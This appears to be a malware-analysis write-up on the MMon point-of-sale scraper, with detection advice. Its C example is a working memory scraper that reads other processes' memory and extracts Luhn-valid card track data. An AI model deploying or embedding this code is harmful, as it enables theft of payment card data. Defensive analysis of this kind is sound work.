Introduction

This family has been around since 2010. According to a Visa report (September 2020), the malware was used in an intrusion at a North American merchant. Visa also states that MMon's code has served as a base for several other point-of-sale (POS) malware families, including JavalinPOS, BlackPOS and POSRAM.

MMon Analysis

The PDB path mmon.pdb is a good indicator for identifying samples that are based on MMon.

[Screenshot: mmon.pdb PDB path string in the sample]

MMon supports a few command-line options. It can scan either all processes or specific processes, and it can search for kartoxa (carder slang for card track data) or for arbitrary user-supplied patterns.

[Screenshot: MMon command-line usage]

To search process memory it uses the usual Win32 combination of OpenProcess(), VirtualQueryEx() and ReadProcessMemory(): open a handle to the target process, enumerate its memory regions one at a time, and read each committed region into a local buffer that is then scanned for track data.

[Screenshots: memory scanning routine (OpenProcess, VirtualQueryEx, ReadProcessMemory)]

Candidate tracks are validated with the Luhn check-digit algorithm, which weeds out most of the digit sequences that merely look like card numbers.

[Screenshot: Luhn validation routine]
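The scanning loop and the Luhn check described above, written out as an added example in C (illustrative code, not MMon's own): scan_track2() finds Track 2 candidates in a byte buffer and luhn_ok() validates the PAN. On Windows, walk_process() feeds every committed region of a target process through the scanner using the OpenProcess/VirtualQueryEx/ReadProcessMemory sequence; elsewhere main() runs the scanner over a constructed buffer that stands in for a region read from a process. The function and parameter names and the sample buffer are constructed for this example.

```c
/*
 * Added example (not MMon's own code): the two building blocks of a
 * memory-scraping POS scanner.
 *   luhn_ok()      - Luhn check-digit validation of a PAN
 *   scan_track2()  - find Track 2 data (;PAN=YYMMsss...?) in a byte buffer
 *   walk_process() - Windows only: read each committed region of a process
 *                    and scan it (OpenProcess / VirtualQueryEx / ReadProcessMemory)
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <stddef.h>

/* Luhn: double every second digit from the right (9 -> 9, 8 -> 7, ...), sum % 10 == 0 */
int luhn_ok(const char *pan, size_t len)
{
    int sum = 0, dbl = 0;
    for (size_t i = len; i-- > 0; ) {
        int d = pan[i] - '0';
        if (dbl) { d *= 2; if (d > 9) d -= 9; }
        sum += d;
        dbl = !dbl;
    }
    return len >= 13 && len <= 19 && sum % 10 == 0;
}

typedef void (*track_cb)(const char *track, size_t len);

/*
 * Track 2 layout: ';' start sentinel, 13-19 digit PAN, '=' separator,
 * YYMM expiry + 3-digit service code (+ optional discretionary digits),
 * '?' end sentinel. Returns the number of candidates whose PAN passes
 * Luhn; each one is handed to cb (if non-NULL).
 */
size_t scan_track2(const unsigned char *buf, size_t n, track_cb cb)
{
    size_t found = 0;
    for (size_t i = 0; i + 1 < n; i++) {
        if (buf[i] != ';') continue;
        size_t j = i + 1, pan_len = 0;
        while (j < n && isdigit(buf[j]) && pan_len < 19) { j++; pan_len++; }
        if (pan_len < 13 || j >= n || buf[j] != '=') continue;
        size_t k = j + 1, digits = 0;
        while (k < n && isdigit(buf[k])) { k++; digits++; }
        if (digits < 7 || k >= n || buf[k] != '?') continue;  /* need at least YYMM + service code */
        if (!luhn_ok((const char *)buf + i + 1, pan_len)) continue;
        found++;
        if (cb) cb((const char *)buf + i, k - i + 1);
        i = k;
    }
    return found;
}

#ifdef _WIN32
#include <windows.h>
/* Walk every committed, readable region of process `pid` and scan it. */
size_t walk_process(DWORD pid, track_cb cb)
{
    size_t total = 0;
    HANDLE h = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pid);
    if (!h) return 0;
    MEMORY_BASIC_INFORMATION mbi;
    unsigned char *addr = NULL;
    while (VirtualQueryEx(h, addr, &mbi, sizeof mbi) == sizeof mbi) {
        if (mbi.State == MEM_COMMIT && !(mbi.Protect & (PAGE_GUARD | PAGE_NOACCESS))) {
            unsigned char *region = malloc(mbi.RegionSize);
            SIZE_T got = 0;
            if (region && ReadProcessMemory(h, mbi.BaseAddress, region, mbi.RegionSize, &got))
                total += scan_track2(region, got, cb);
            free(region);
        }
        addr = (unsigned char *)mbi.BaseAddress + mbi.RegionSize;  /* next region */
    }
    CloseHandle(h);
    return total;
}
#endif

static void print_track(const char *track, size_t len)
{
    printf("track: %.*s\n", (int)len, track);
}

/* Constructed sample "process memory": one valid test track (Luhn-correct
 * PAN 4111111111111111), one with a broken check digit, and binary noise. */
static const unsigned char sample_mem[] =
    "garbage\0\0;4111111111111111=25121010000000000?"
    "\x90\x90;4111111111111112=25121010000000000?more\0";

size_t demo_scan(void)
{
    return scan_track2(sample_mem, sizeof sample_mem, print_track);
}

int main(void)
{
    printf("valid tracks found: %zu\n", demo_scan());
    return 0;
}
```

The Luhn step is what keeps the output useful: a bare ;digits=digits? pattern fires on plenty of non-card data in a heap, and most of those strings fail the check digit. From the defender's side, the handle opened in walk_process() is the observable: a process requesting PROCESS_VM_READ on the payment application (Sysmon event ID 10, ProcessAccess) is a reasonable detection hook for this whole malware family.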

As seen below, MMon was able to find the tracks within the notepad process.

[Screenshot: MMon output listing the tracks found in the notepad process]

Conclusion

MMon is essentially a simple command-line tool for finding credit card data and other patterns in process memory.